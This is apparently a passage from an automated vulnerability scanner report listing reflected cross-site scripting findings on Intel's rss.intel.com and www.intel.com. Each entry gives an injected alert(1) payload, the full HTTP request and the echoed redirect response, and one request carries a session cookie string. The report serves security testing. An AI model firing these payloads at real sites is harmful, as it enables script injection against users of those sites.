Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style%3d"x%3aexpression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dadd6"style%3d"x%3aexpression(alert(1))"a8ffa0511c5 was submitted in the REST URL parameter 9. This input was echoed as dadd6"style="x:expression(alert(1))"a8ffa0511c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31dadd6"style%3d"x%3aexpression(alert(1))"a8ffa0511c5/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31dadd6"style="x:expression(alert(1))"a8ffa0511c5/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa91f"style%3d"x%3aexpression(alert(1))"6ea33654632 was submitted in the REST URL parameter 10. This input was echoed as fa91f"style="x:expression(alert(1))"6ea33654632 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solutionfa91f"style%3d"x%3aexpression(alert(1))"6ea33654632 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solutionfa91f"style="x:expression(alert(1))"6ea33654632?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d862"style%3d"x%3aexpression(alert(1))"b65d0f7bf80 was submitted in the REST URL parameter 2. This input was echoed as 6d862"style="x:expression(alert(1))"b65d0f7bf80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-2641026d862"style%3d"x%3aexpression(alert(1))"b65d0f7bf80/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-2641026d862"style="x:expression(alert(1))"b65d0f7bf80"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7b3c"style%3d"x%3aexpression(alert(1))"5cf453fb1b6 was submitted in the REST URL parameter 3. This input was echoed as e7b3c"style="x:expression(alert(1))"5cf453fb1b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.come7b3c"style%3d"x%3aexpression(alert(1))"5cf453fb1b6/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.come7b3c"style="x:expression(alert(1))"5cf453fb1b6/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d32af"style%3d"x%3aexpression(alert(1))"8b71a1cc4e5 was submitted in the REST URL parameter 4. This input was echoed as d32af"style="x:expression(alert(1))"8b71a1cc4e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/communityd32af"style%3d"x%3aexpression(alert(1))"8b71a1cc4e5/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/communityd32af"style="x:expression(alert(1))"8b71a1cc4e5/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb38a"style%3d"x%3aexpression(alert(1))"70a761bace1 was submitted in the REST URL parameter 5. This input was echoed as eb38a"style="x:expression(alert(1))"70a761bace1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroomeb38a"style%3d"x%3aexpression(alert(1))"70a761bace1/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomeb38a"style="x:expression(alert(1))"70a761bace1/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a85ab"style%3d"x%3aexpression(alert(1))"efed0610cc5 was submitted in the REST URL parameter 6. This input was echoed as a85ab"style="x:expression(alert(1))"efed0610cc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/bloga85ab"style%3d"x%3aexpression(alert(1))"efed0610cc5/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/bloga85ab"style="x:expression(alert(1))"efed0610cc5/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df855"style%3d"x%3aexpression(alert(1))"2637a52c4aa was submitted in the REST URL parameter 7. This input was echoed as df855"style="x:expression(alert(1))"2637a52c4aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011df855"style%3d"x%3aexpression(alert(1))"2637a52c4aa/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011df855"style="x:expression(alert(1))"2637a52c4aa/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5460e"style%3d"x%3aexpression(alert(1))"ca2cafebd5e was submitted in the REST URL parameter 8. This input was echoed as 5460e"style="x:expression(alert(1))"ca2cafebd5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/015460e"style%3d"x%3aexpression(alert(1))"ca2cafebd5e/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/015460e"style="x:expression(alert(1))"ca2cafebd5e/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8580"style%3d"x%3aexpression(alert(1))"1d378863169 was submitted in the REST URL parameter 9. This input was echoed as a8580"style="x:expression(alert(1))"1d378863169 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31a8580"style%3d"x%3aexpression(alert(1))"1d378863169/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31a8580"style="x:expression(alert(1))"1d378863169/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbebe"style%3d"x%3aexpression(alert(1))"66fe35fec0d was submitted in the REST URL parameter 10. This input was echoed as bbebe"style="x:expression(alert(1))"66fe35fec0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hoursbbebe"style%3d"x%3aexpression(alert(1))"66fe35fec0d HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hoursbbebe"style="x:expression(alert(1))"66fe35fec0d?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccbda"style%3d"x%3aexpression(alert(1))"cd785807712 was submitted in the REST URL parameter 2. This input was echoed as ccbda"style="x:expression(alert(1))"cd785807712 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131ccbda"style%3d"x%3aexpression(alert(1))"cd785807712/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131ccbda"style="x:expression(alert(1))"cd785807712"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa199"style%3d"x%3aexpression(alert(1))"23b41b411a was submitted in the REST URL parameter 3. This input was echoed as aa199"style="x:expression(alert(1))"23b41b411a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.comaa199"style%3d"x%3aexpression(alert(1))"23b41b411a/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.comaa199"style="x:expression(alert(1))"23b41b411a/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8c1"style%3d"x%3aexpression(alert(1))"fc79ab44046 was submitted in the REST URL parameter 4. This input was echoed as fe8c1"style="x:expression(alert(1))"fc79ab44046 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/communityfe8c1"style%3d"x%3aexpression(alert(1))"fc79ab44046/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/communityfe8c1"style="x:expression(alert(1))"fc79ab44046/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc99"style%3d"x%3aexpression(alert(1))"562e67141d2 was submitted in the REST URL parameter 5. This input was echoed as acc99"style="x:expression(alert(1))"562e67141d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroomacc99"style%3d"x%3aexpression(alert(1))"562e67141d2/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomacc99"style="x:expression(alert(1))"562e67141d2/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b96e"style%3d"x%3aexpression(alert(1))"93e07c87b37 was submitted in the REST URL parameter 6. This input was echoed as 4b96e"style="x:expression(alert(1))"93e07c87b37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog4b96e"style%3d"x%3aexpression(alert(1))"93e07c87b37/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog4b96e"style="x:expression(alert(1))"93e07c87b37/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18bf7"style%3d"x%3aexpression(alert(1))"f7271d816f7 was submitted in the REST URL parameter 7. This input was echoed as 18bf7"style="x:expression(alert(1))"f7271d816f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/201118bf7"style%3d"x%3aexpression(alert(1))"f7271d816f7/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201118bf7"style="x:expression(alert(1))"f7271d816f7/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26d6b"style%3d"x%3aexpression(alert(1))"911c05b74a9 was submitted in the REST URL parameter 8. This input was echoed as 26d6b"style="x:expression(alert(1))"911c05b74a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/0226d6b"style%3d"x%3aexpression(alert(1))"911c05b74a9/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/0226d6b"style="x:expression(alert(1))"911c05b74a9/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8768c"style%3d"x%3aexpression(alert(1))"82ed80d4031 was submitted in the REST URL parameter 9. This input was echoed as 8768c"style="x:expression(alert(1))"82ed80d4031 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/018768c"style%3d"x%3aexpression(alert(1))"82ed80d4031/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/018768c"style="x:expression(alert(1))"82ed80d4031/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of the iid request parameter is copied into the HTML document as plain text between tags. The payload 97bc3<script>alert(1)</script>00808251755 was submitted in the iid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pressroom/index.htm?iid=gg_about+intel_pressroom97bc3<script>alert(1)</script>00808251755 HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; 
INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 301 Moved Permanently
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
